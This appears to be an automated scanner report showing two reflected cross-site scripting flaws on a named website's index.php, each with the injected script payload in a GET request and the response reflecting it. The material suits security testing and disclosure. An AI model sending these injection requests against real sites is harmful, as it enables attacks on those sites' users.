1. Cross-site scripting (reflected)
1.1. http://www.thnic.net/index.php [name of an arbitrarily supplied request parameter]
1.2. http://www.thnic.net/index.php [page parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.thnic.net |
Path: | /index.php |
GET /index.php?44ae9'><script>alert(1)< Host: www.thnic.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:59:26 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=49baaa3aea Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48368 ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?44ae9'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thnic.net |
Path: | /index.php |
GET /index.php?page=policya2c25'><script>alert(1)< Host: www.thnic.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:59:35 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=6017dfd5df Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48363 ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?page ...[SNIP]... |